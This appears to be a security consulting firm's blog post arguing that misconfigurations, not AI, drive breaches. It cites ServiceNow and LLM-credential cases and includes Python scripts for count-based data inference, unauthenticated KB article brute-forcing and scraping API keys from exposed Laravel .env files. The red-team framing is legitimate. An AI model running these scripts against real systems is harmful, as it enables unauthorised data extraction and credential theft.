AI Didn't Breach You. Your Configuration Did.
The headlines scream about LLMs launching autonomous cyberattacks. Security teams are scrambling to protect against AI-powered threats. Meanwhile, attackers continue to walk through the same unlocked doors they've used for decades.
"Funny how the old ways still work the fastest." — Chris Nickerson, Lares Co-Founder, Damovo CEO
The Count(er) Strike Reality Check
In July 2025, Varonis disclosed CVE-2025-3648, dubbed "Count(er) Strike," a high-severity vulnerability in the ServiceNow platform, which is used by 85% of Fortune 500 companies. The flaw allowed attackers to extract sensitive data through record count enumeration. Simple. Effective. Ancient technique.
The MITRE ATT&CK mapping tells the story:
- T1087 (Account Discovery): Enumerate user accounts via API responses
- T1083 (File and Directory Discovery): Infer file contents through count variations
- T1552 (Unsecured Credentials): Extract credentials from exposed knowledge bases
No AI required. Just basic enumeration against misconfigured Access Control Lists.
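To make the technique concrete, here is a minimal sketch of count-based inference against a ServiceNow Table API endpoint. The instance URL, table, field, and low-privilege account are placeholders, and the actual leak channel in the Varonis research (row counts surfaced even for ACL-filtered records) varies by instance; this version uses the simplest possible oracle, whether a filtered query returns anything at all.

```python
import string
import requests

# Placeholders -- point these at an instance you are authorized to test.
INSTANCE = "https://example.service-now.com"
TABLE = "sys_user"                      # any table the account can query
FIELD = "user_name"                     # field whose values we try to infer
AUTH = ("lowpriv_user", "password")     # low-privilege credentials

def has_match(query: str) -> bool:
    """Return True if at least one record matches the encoded query filter."""
    resp = requests.get(
        f"{INSTANCE}/api/now/table/{TABLE}",
        params={"sysparm_query": query, "sysparm_limit": 1, "sysparm_fields": "sys_id"},
        auth=AUTH,
        timeout=10,
    )
    resp.raise_for_status()
    return len(resp.json().get("result", [])) > 0

def infer_value(prefix: str = "") -> str:
    """Extend a known prefix one character at a time using STARTSWITH filters."""
    charset = string.ascii_lowercase + string.digits + "._-"
    while True:
        for ch in charset:
            if has_match(f"{FIELD}STARTSWITH{prefix + ch}"):
                prefix += ch
                break
        else:
            return prefix               # no character extended the prefix; done

if __name__ == "__main__":
    print("Inferred value:", infer_value())
```

Each request is just a yes/no question. Stack enough of them and you have data exfiltration without ever reading a record directly.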
Configuration Drift at Scale
Over 1,000 ServiceNow instances were found exposing corporate Knowledge Base data. The root cause? Default configurations and poor permission hygiene. Internal system details, active credentials, and PII were accessible through public-facing widgets because administrators never properly configured User Criteria settings.
The attack methodology was textbook (sketched in code after this list):
- Identify exposed ServiceNow instance
- Brute force KB article IDs (KBXXXXXXX format)
- Extract sensitive data through unauthenticated requests
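A hedged sketch of steps two and three: walk candidate article numbers in the KBXXXXXXX format and flag anything readable without authentication. The kb_view.do path is a standard ServiceNow knowledge URL, but the exposure in the reported cases came through public Service Portal widgets, so treat both the URL and the "readable" heuristic as assumptions to adapt per instance.

```python
import requests

# Hypothetical target -- replace with the instance you are authorized to test.
INSTANCE = "https://example.service-now.com"
SESSION = requests.Session()

def article_exposed(number: int) -> bool:
    """Request a KB article by its sequential ID without authenticating."""
    article_id = f"KB{number:07d}"      # KBXXXXXXX format noted in the research
    resp = SESSION.get(
        f"{INSTANCE}/kb_view.do",
        params={"sysparm_article": article_id},
        allow_redirects=False,
        timeout=10,
    )
    # A redirect to a login page usually means the article is protected;
    # a 200 response containing the article ID suggests it is world-readable.
    return resp.status_code == 200 and article_id in resp.text

if __name__ == "__main__":
    exposed = [n for n in range(1, 2000) if article_exposed(n)]
    print(f"{len(exposed)} articles readable without authentication")
```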
These are the types of attacks Lares' red teams perform regularly. Enumeration, fuzzing, access control bypasses, and data exfiltration are core parts of our assessment approach.
LLM Attacks That Weren't
Recent "LLM hijacking" campaigns sound sophisticated. Attackers are reportedly stealing billions of tokens from AI services. The reality? Traditional credential theft from misconfigured applications.
The actual attack chain:
- T1190 (Exploit Public-Facing Application): Target Laravel framework vulnerabilities
- T1552.001 (Credentials In Files): Extract API keys from exposed configuration files (see the sketch after this list)
- T1496 (Resource Hijacking): Use stolen credentials to access LLM services
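For the credential-extraction step, a sketch of what the hunting typically looks like: probe a handful of paths where misdeployed Laravel applications leave .env files world-readable and grep the response for AI-service keys. The paths and variable names are common defaults chosen for illustration, not details taken from the reporting.

```python
import re
import requests

# Key names worth flagging -- common examples, not specifics from the reporting.
KEY_PATTERN = re.compile(
    r"^(OPENAI_API_KEY|ANTHROPIC_API_KEY|AWS_ACCESS_KEY_ID|AWS_SECRET_ACCESS_KEY)=(.+)$",
    re.MULTILINE,
)
# Paths where misconfigured deployments commonly expose environment files.
CANDIDATE_PATHS = ["/.env", "/laravel/.env", "/api/.env"]

def find_exposed_keys(base_url: str) -> list[tuple[str, str]]:
    """Fetch candidate .env locations and return any credential-looking lines."""
    hits = []
    for path in CANDIDATE_PATHS:
        try:
            resp = requests.get(base_url + path, timeout=10)
        except requests.RequestException:
            continue
        # APP_KEY is a standard Laravel variable; its presence suggests a real env file.
        if resp.status_code == 200 and "APP_KEY=" in resp.text:
            hits.extend(KEY_PATTERN.findall(resp.text))
    return hits

if __name__ == "__main__":
    for name, value in find_exposed_keys("https://target.example.com"):
        print(f"exposed credential: {name}={value[:6]}...")
```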
The "AI attack" was credential stuffing with better marketing.
Testing Your Reality
Your red team should be finding these issues before attackers do. Here's where to focus:
Configuration Assessment Framework:
- ServiceNow instances: Test ACL configurations, knowledge base permissions, API exposure
- Cloud services: Review IAM policies, storage permissions, API gateway configurations (a storage-permission check is sketched after this list)
- AI/LLM integrations: Validate credential management, API key rotation, access logging
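As one example of the cloud-services bullet, here is a minimal boto3 sketch that flags S3 buckets with no public access block configured. It assumes credentials permitted to call s3:ListAllMyBuckets and s3:GetBucketPublicAccessBlock, checks only this single control (account-level blocks and bucket policies still need separate review), and is a starting point rather than a complete assessment.

```python
import boto3
from botocore.exceptions import ClientError

def buckets_without_public_access_block() -> list[str]:
    """Flag S3 buckets that have no bucket-level public access block at all,
    or that have any of the four block settings disabled."""
    s3 = boto3.client("s3")
    flagged = []
    for bucket in s3.list_buckets()["Buckets"]:
        name = bucket["Name"]
        try:
            config = s3.get_public_access_block(Bucket=name)["PublicAccessBlockConfiguration"]
            if not all(config.values()):      # any of the four settings disabled
                flagged.append(name)
        except ClientError as err:
            if err.response["Error"]["Code"] == "NoSuchPublicAccessBlockConfiguration":
                flagged.append(name)          # no block configured at all
            else:
                raise
    return flagged

if __name__ == "__main__":
    for name in buckets_without_public_access_block():
        print(f"review public access settings: {name}")
```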
PTES-aligned methodology:
- Information Gathering: Enumerate cloud services and SaaS platforms (see the discovery sketch after this list)
- Vulnerability Assessment: Test default configurations against security baselines
- Exploitation: Demonstrate business impact through data extraction
- Post-Exploitation: Map lateral movement paths through misconfigured services
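A sketch of the information-gathering step under stated assumptions: derive candidate SaaS hostnames from an organization name and keep the ones that resolve. The *.service-now.com pattern is ServiceNow's convention; the other suffixes are common vendor patterns listed for illustration, and some vendors use wildcard DNS, so a hit is a lead to verify, not a confirmed tenant.

```python
import socket

# Vendor tenant patterns -- *.service-now.com is the ServiceNow convention;
# the others are common SaaS hostname patterns included for illustration.
TENANT_PATTERNS = [
    "{org}.service-now.com",
    "{org}.atlassian.net",
    "{org}.sharepoint.com",
    "{org}.okta.com",
]

def discover_tenants(org: str) -> list[str]:
    """Return candidate SaaS hostnames for an organization that resolve in DNS.
    A resolving name means the tenant likely exists; it says nothing yet about
    whether it is misconfigured, and wildcard DNS can produce false positives."""
    found = []
    for pattern in TENANT_PATTERNS:
        hostname = pattern.format(org=org)
        try:
            socket.gethostbyname(hostname)
            found.append(hostname)
        except socket.gaierror:
            continue
    return found

if __name__ == "__main__":
    print(discover_tenants("example"))
```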
The Bottom Line
AI isn't breaching your environment. Your twenty-year-old configuration management problems are.
While you're building defenses against theoretical AI threats, attackers are extracting your data through the same misconfigurations that have existed since your systems went online.
Fix the fundamentals first. Everything else is theater.
Ready to test your real attack surface? Lares Red Teams specialize in identifying critical configuration issues before your adversaries do.
References:
- Cybersecurity Dive. (2025, July 28). Research shows LLMs can conduct sophisticated attacks without humans. https://www.cybersecuritydive.com/news/research-llms-attacks-without-humans/754203/
- Fortune. (2025, February 18). AI security risks are in the spotlight—but hackers say models are still alarmingly easy to attack. https://fortune.com/2025/02/18/ai-security-risks-are-in-the-spotlight-but-hackers-say-models-are-still-alarmingly-easy-to-attack/
- Varonis. (2025, July 18). Count(er) Strike – Data inference vulnerability in ServiceNow. https://www.varonis.com/blog/counter-strike-servicenow
- BleepingComputer. (2024, September 17). Over 1,000 ServiceNow instances found leaking corporate KB data. https://www.bleepingcomputer.com/news/security/over-1-000-servicenow-instances-found-leaking-corporate-kb-data/
- NSFOCUS Global. (2025, March 10). The invisible battlefield behind LLM security crisis. https://nsfocusglobal.com/the-invisible-battlefield-behind-llm-security-crisis/
Empowering Organizations to Maximize Their Security Potential.
Lares is a security consulting firm that, since 2008, has helped companies secure electronic, physical, intellectual, and financial assets through a unique blend of assessment, testing, and coaching.
16+ years in business
600+ customers worldwide
4,500+ engagements